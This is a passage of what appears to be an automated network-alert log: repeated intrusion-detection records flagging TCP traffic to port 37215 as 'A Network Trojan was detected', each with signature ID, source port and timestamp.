            SID:2829579
            Source Port:44526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.072445
            SID:2829579
            Source Port:35228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912276
            SID:2835222
            Source Port:43686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.573033
            SID:2835222
            Source Port:45116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.459305
            SID:2835222
            Source Port:59756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.706600
            SID:2835222
            Source Port:37502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.409751
            SID:2829579
            Source Port:33834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746178
            SID:2835222
            Source Port:46966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.011325
            SID:2835222
            Source Port:43878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880400
            SID:2829579
            Source Port:57966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.550512
            SID:2835222
            Source Port:43248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568653
            SID:2829579
            Source Port:39130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989607
            SID:2829579
            Source Port:40370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001656
            SID:2835222
            Source Port:33712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320418
            SID:2829579
            Source Port:57242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842005
            SID:2829579
            Source Port:57402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.386280
            SID:2829579
            Source Port:56612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.940300
            SID:2835222
            Source Port:52618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.915993
            SID:2835222
            Source Port:48512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.075743
            SID:2829579
            Source Port:59034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901355
            SID:2835222
            Source Port:34886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854739
            SID:2829579
            Source Port:51776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.882046
            SID:2835222
            Source Port:56390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754423
            SID:2829579
            Source Port:60334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.547621
            SID:2829579
            Source Port:60636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863270
            SID:2835222
            Source Port:57596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790619
            SID:2835222
            Source Port:35502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.817611
            SID:2835222
            Source Port:46500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.916665
            SID:2829579
            Source Port:36144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.988998
            SID:2829579
            Source Port:55156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.075040
            SID:2835222
            Source Port:36270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052435
            SID:2835222
            Source Port:51116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596339
            SID:2835222
            Source Port:47542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.262947
            SID:2835222
            Source Port:59876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928193
            SID:2835222
            Source Port:50352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998296
            SID:2829579
            Source Port:42958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848772
            SID:2829579
            Source Port:60730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855592
            SID:2829579
            Source Port:52154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.912804
            SID:2829579
            Source Port:47768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352447
            SID:2829579
            Source Port:44218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901536
            SID:2835222
            Source Port:59790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967951
            SID:2835222
            Source Port:59910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434581
            SID:2835222
            Source Port:57762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.804656
            SID:2835222
            Source Port:41658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.572419
            SID:2829579
            Source Port:54066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809657
            SID:2835222
            Source Port:46080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.515685
            SID:2835222
            Source Port:41032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.864564
            SID:2835222
            Source Port:54548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508040
            SID:2829579
            Source Port:57248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.932685
            SID:2835222
            Source Port:56290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957596
            SID:2829579
            Source Port:42468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.549750
            SID:2829579
            Source Port:57446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857082
            SID:2829579
            Source Port:57930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910849
            SID:2835222
            Source Port:49732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968316
            SID:2829579
            Source Port:49200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.379837
            SID:2829579
            Source Port:53216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290666
            SID:2835222
            Source Port:44574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967681
            SID:2829579
            Source Port:60976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.875818
            SID:2835222
            Source Port:53976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778770
            SID:2835222
            Source Port:57486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775548
            SID:2835222
            Source Port:59262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.846920
            SID:2829579
            Source Port:53150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412792
            SID:2835222
            Source Port:42632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707626
            SID:2829579
            Source Port:44792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809824
            SID:2835222
            Source Port:39942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912230
            SID:2835222
            Source Port:50444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995981
            SID:2835222
            Source Port:52934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344164
            SID:2835222
            Source Port:38042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.921538
            SID:2835222
            Source Port:36540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046506
            SID:2835222
            Source Port:45364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.915966
            SID:2829579
            Source Port:58852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069383
            SID:2829579
            Source Port:34900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.553216
            SID:2835222
            Source Port:51958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811051
            SID:2835222
            Source Port:39406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471331
            SID:2829579
            Source Port:55244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877725
            SID:2829579
            Source Port:59170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999371
            SID:2835222
            Source Port:45230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.544548
            SID:2829579
            Source Port:39482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665676
            SID:2829579
            Source Port:35458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.719507
            SID:2829579
            Source Port:44900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.933804
            SID:2829579
            Source Port:45886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919861
            SID:2835222
            Source Port:34484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760168
            SID:2829579
            Source Port:41246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.856407
            SID:2829579
            Source Port:42186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304283
            SID:2835222
            Source Port:41964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827883
            SID:2835222
            Source Port:38646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824629
            SID:2835222
            Source Port:36258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.574584
            SID:2835222
            Source Port:50740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924358
            SID:2829579
            Source Port:34416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935928
            SID:2835222
            Source Port:33950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931585
            SID:2829579
            Source Port:34784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923917
            SID:2835222
            Source Port:55256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433644
            SID:2835222
            Source Port:54966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.441479
            SID:2835222
            Source Port:42598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002380
            SID:2829579
            Source Port:59370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.540184
            SID:2835222
            Source Port:52960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935915
            SID:2835222
            Source Port:36944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069491
            SID:2829579
            Source Port:35710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.565594
            SID:2835222
            Source Port:57084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864882
            SID:2835222
            Source Port:54660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777610
            SID:2829579
            Source Port:39324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.563769
            SID:2829579
            Source Port:56344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.949015
            SID:2829579
            Source Port:42612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.848441
            SID:2829579
            Source Port:42636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.933394
            SID:2835222
            Source Port:38562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.806004
            SID:2829579
            Source Port:36026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.072780
            SID:2835222
            Source Port:36812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.722072
            SID:2829579
            Source Port:52924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916961
            SID:2835222
            Source Port:45734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.675237
            SID:2835222
            Source Port:39332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870475
            SID:2829579
            Source Port:47810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260826
            SID:2829579
            Source Port:41574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730082
            SID:2835222
            Source Port:57236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.953177
            SID:2829579
            Source Port:48008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990051
            SID:2829579
            Source Port:54468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776921
            SID:2835222
            Source Port:48416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.949002
            SID:2829579
            Source Port:42574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334147
            SID:2835222
            Source Port:44774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943449
            SID:2829579
            Source Port:51598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915001
            SID:2829579
            Source Port:44436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.879163
            SID:2829579
            Source Port:50896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805714
            SID:2829579
            Source Port:36442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900653
            SID:2829579
            Source Port:42144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.999315
            SID:2829579
            Source Port:36074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860707
            SID:2835222
            Source Port:35380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.950920
            SID:2829579
            Source Port:36862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.989051
            SID:2829579
            Source Port:53842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936060
            SID:2829579
            Source Port:56384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864292
            SID:2829579
            Source Port:50138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.652618
            SID:2835222
            Source Port:44830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459613
            SID:2835222
            Source Port:34260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748234
            SID:2829579
            Source Port:34742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900994
            SID:2835222
            Source Port:58728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999222
            SID:2835222
            Source Port:45388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290602
            SID:2835222
            Source Port:59172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.974989
            SID:2829579
            Source Port:54208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048612
            SID:2835222
            Source Port:41236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843061
            SID:2835222
            Source Port:36636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.060178
            SID:2835222
            Source Port:55248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604493
            SID:2829579
            Source Port:52640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610501
            SID:2835222
            Source Port:47328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737176
            SID:2835222
            Source Port:46014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.388863
            SID:2835222
            Source Port:56252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.314070
            SID:2835222
            Source Port:38520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956833
            SID:2829579
            Source Port:43368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.441280
            SID:2829579
            Source Port:45918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.050992
            SID:2835222
            Source Port:50970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814183
            SID:2835222
            Source Port:51574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.325820
            SID:2829579
            Source Port:60440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.646545
            SID:2835222
            Source Port:55230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.738712
            SID:2829579
            Source Port:50054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782516
            SID:2835222
            Source Port:40836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058505
            SID:2829579
            Source Port:36836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.291929
            SID:2829579
            Source Port:50398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321201
            SID:2829579
            Source Port:51266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543166
            SID:2835222
            Source Port:51310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069400
            SID:2829579
            Source Port:50790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860802
            SID:2829579
            Source Port:40414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.341857
            SID:2835222
            Source Port:53932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842078
            SID:2835222
            Source Port:50170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459743
            SID:2835222
            Source Port:41696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748568
            SID:2829579
            Source Port:49062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.761883
            SID:2835222
            Source Port:50294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308292
            SID:2835222
            Source Port:42018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.038052
            SID:2835222
            Source Port:36560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.762158
            SID:2829579
            Source Port:55274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935289
            SID:2829579
            Source Port:39958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.916609
            SID:2829579
            Source Port:35116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.774730
            SID:2829579
            Source Port:59322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.998289
            SID:2829579
            Source Port:60008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855694
            SID:2835222
            Source Port:39692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.339056
            SID:2835222
            Source Port:37354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.411279
            SID:2835222
            Source Port:34490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377590
            SID:2835222
            Source Port:46404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026276
            SID:2835222
            Source Port:41102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746228
            SID:2835222
            Source Port:55588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990131
            SID:2835222
            Source Port:59080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755972
            SID:2829579
            Source Port:36984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278098
            SID:2835222
            Source Port:46350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507359
            SID:2829579
            Source Port:51286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507970
            SID:2829579
            Source Port:41642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956382
            SID:2835222
            Source Port:46952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919357
            SID:2829579
            Source Port:59162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026845
            SID:2835222
            Source Port:57674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.520745
            SID:2835222
            Source Port:32844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851163
            SID:2829579
            Source Port:57666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.373720
            SID:2829579
            Source Port:33238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755850
            SID:2829579
            Source Port:58066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.738328
            SID:2829579
            Source Port:46766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.065217
            SID:2835222
            Source Port:40766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.950346
            SID:2829579
            Source Port:35078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.882526
            SID:2835222
            Source Port:51998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753403
            SID:2835222
            Source Port:43772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995566
            SID:2835222
            Source Port:45630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.741882
            SID:2829579
            Source Port:46696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.802294
            SID:2829579
            Source Port:54424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.030870
            SID:2829579
            Source Port:52096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777643
            SID:2829579
            Source Port:54422
            Destination Port:37215
